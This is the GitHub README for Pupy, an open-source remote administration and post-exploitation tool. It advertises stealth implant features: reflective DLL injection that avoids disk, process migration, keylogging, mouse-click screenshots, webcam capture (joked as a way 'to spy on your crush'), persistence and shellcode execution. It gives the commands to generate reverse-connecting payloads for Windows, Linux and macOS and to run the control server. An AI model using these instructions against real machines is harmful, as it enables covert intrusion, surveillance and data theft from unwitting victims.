Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python
Go to file
n1nj4sec 00c9a583e0 adding an option to pupygen to randomize the executable hash 2016-01-19 14:22:45 +01:00
client removing deprecated makefiles 2016-01-13 21:47:39 +01:00
docs/screenshots README update 2016-01-11 19:17:06 +01:00
pupy adding an option to pupygen to randomize the executable hash 2016-01-19 14:22:45 +01:00
.gitignore gitignore update 2015-11-23 18:46:19 +01:00
.gitmodules adding scapy package as a submodule+symlink, will probably need a fix on windows as symlinks won't work 2016-01-16 13:02:26 +01:00
LICENSE license update 2015-11-23 18:51:37 +01:00
README.md README update 2016-01-11 19:17:06 +01:00

README.md

Pupy

Pupy is an opensource, multi-platform Remote Administration Tool with an embedded Python interpreter, allowing its modules to load python packages from memory and transparently access remote python objects. Pupy can communicate using different transports and have a bunch of cool features & modules. On Windows, Pupy uses reflective dll injection and leaves no traces on disk.

Features

  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented)
  • Modules are quite simple to write and pupy is easily extensible
  • A lot of awesome modules are already implemented!
  • Pupy uses rpyc and a module can directly access python objects on the remote client
    • We can also access remote objects interactively from the pupy shell and you even get auto-completion of remote attributes!
  • Communication transports are modular and pupy can communicate using obfsproxy pluggable transports
  • All the non interactive modules can be dispatched to multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu, osx)
  • Modules can be executed as background jobs and their output be retrieved later
  • Commands and scripts running on remote hosts are interruptible
  • Auto-completion for commands and arguments
  • Nice colored output :-)
  • Command aliases can be defined in the config

Implemented Transports

Implemented Launchers

Launchers allow pupy to run custom actions before starting the reverse connection

  • simple
    • Just connect back
  • auto_proxy
    • Retrieve a list of possible SOCKS/HTTP proxies and try each one of them. Proxy retriaval methods are: registry, WPAD requests, gnome settings, HTTP_PROXY env variable

Implemented Modules

  • migrate
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • command execution
  • interactive shell (cmd.exe, /bin/sh, /bin/bash, ...)
    • tty allocation is well supported on target running a unix system. Just looks like a ssh shell
  • interactive python shell
  • download
  • upload
  • persistence
  • screenshot
  • webcam snapshot
    • to spy on your crush
  • in memory execution of PE exe both x86 and x64!
  • socks5 proxy
  • local port forwarding
  • shellcode exec (thanks to @byt3bl33d3r)
  • keylogger
    • monitor keys and the titles of the windows the text is typed into, plus the clipboard! (thanks @golind for the updates)
  • mouselogger:
    • takes small screenshots around the mouse at each click and send them back to the server (thanks @golind)

##Quick start ###Installation

pip install rpyc
pip install pefile 
pip install pycrypto 

####Troubleshooting If you have some issues with rpyc while running the server on windows, take a look at issue #25, @deathfantasy made a fix

Generate/run a payload

In these examples the server is running on a linux host (tested on kali linux) and its IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

for Windows

$ ./pupygen.py auto_proxy -h
usage: auto_proxy [-h] --host <host:port>
                  [--transport {obfs3,tcp_cleartext,tcp_ssl,tcp_base64,scramblesuit}]
				                    ...
$ ./pupygen.py -t exe_x86 auto_proxy --transport tcp_ssl --host 192.168.2.132:443
binary generated with config :
OUTPUT_PATH = ~/pupy/pupyx86.exe
LAUNCHER = 'auto_proxy'
LAUNCHER_ARGS = ['--transport', 'tcp_ssl', '--host', '192.168.2.132:443']
OFFLINE_SCRIPT = None

									

you can also:

  • use another launcher (currently simple or auto_proxy)
  • use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means
  • customize the transport used by supplying it with --transport

for Linux & Mac OS X

pip install rpyc #(or manually copy it if you are not admin) 
pip install pycrypto 
python pp.py simple --transport tcp_ssl --host 127.0.0.2:443 

you can also:

  • modify the default arguments at the top of the file to call pp.py without arguments
  • build a single binary with pyinstaller:
pyinstaller --onefile /full_path/pupy/pupy/pp.py

start the server

  1. eventually edit pupy.conf to change the bind address / port
  2. start the pupy server with the transport used by the client (tcp_ssl by default):
./pupysh.py --transport <transport_used>

Some screenshots

#####list connected clients screenshot1 #####help screenshot3 #####execute python code on all clients screenshot2 #####execute a command on all clients, exception is retrieved in case the command does not exists screenshot4 #####use a filter to send a module only on selected clients screenshot5 #####migrate into another process screenshot6 #####interactive shells screenshot7 screenshot7bis #####interactive python shell screenshot8 #####upload and run another PE exe from memory screenshot9

##Example: How to write a MsgBox module First of all write the function/class you want to import on the remote client
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py

import ctypes
import threading

def MessageBox(text, title):
	t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
	t.daemon=True
	t.start()

then, simply create a module to load our package and call the function remotely

class MsgBoxPopup(PupyModule):
	""" Pop up a custom message box """

	def init_argparse(self):
		self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
		self.arg_parser.add_argument('--title', help='msgbox title')
		self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

	@windows_only
	def is_compatible(self):
		pass

	def run(self, args):
		self.client.load_package("pupwinutils.msgbox")
		self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
		self.log("message box popped !")

and that's it, we have a fully functional module :)

>> run msgbox -h
usage: msgbox [-h] [--title TITLE] text

Pop up a custom message box

positional arguments:
  text           text to print in the msgbox :)

  optional arguments:
    -h, --help     show this help message and exit
    --title TITLE  msgbox title

Dependencies

rpyc (https://github.com/tomerfiliba/rpyc)
pycrypto
pefile
yaml (only needed if using scramblesuit transport)

##Roadmap and ideas Some ideas without any priority order

  • make the PE memory execution works interactively
  • handle tty in interactive shell
  • exfiltration through obfsproxy obfuscated network stream?
  • webcam snapshots
  • bind payloads instead of reverse
  • make the network transports stackable (for example to encapsulate SSL over scramblesuit)
  • make the python compiled C extension load from memory on linux
  • make the migrate modules works on linux
  • add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
  • integrate scapy in the windows dll :D (that would be fun)
  • then make some network attack/sniffing tools modules using scapy
  • work on stealthiness under unix systems
  • mic recording
  • socks5 udp support
  • remote port forwarding
  • add a wiki and write some documentation
  • split the README into the wiki
  • The backdoor factory?
  • Impacket?
  • add auto-completion to the pyshell module
  • support for https & socks proxy
  • HTTP transport
  • UDP transport
  • DNS transport
  • ICMP transport
  • bypass UAC module
  • privilege elevation module
  • ...
  • other cool ideas?

FAQ

Does the server work on windows?

Pupy server works best on linux. The server on windows has not been really tested and there is probably a lot of bugs. I try my best to code in a portable way but I don't always find the time to fix everything. If you find the courage to patch non-portable code, I will gladly accept pull requests! :)

I can't install it, how does it work?

Use pip to install all the dependencies

hey c4n y0u add a DDOS module plzz?

No.

I was wondering if you had a BTC address I could send a tip over to

Sure, here you go : Bitcoin address: 12BKKN81RodiG9vxJn34Me9ky19ArqNQxC

Contact

by mail: contact@n1nj4.eu
on Twitter: Follow me on twitter

If some of you want to participate or send me a feedback, don't hesitate :-)
This project is a personal project, please respect its philosophy and don't use it for evil purposes!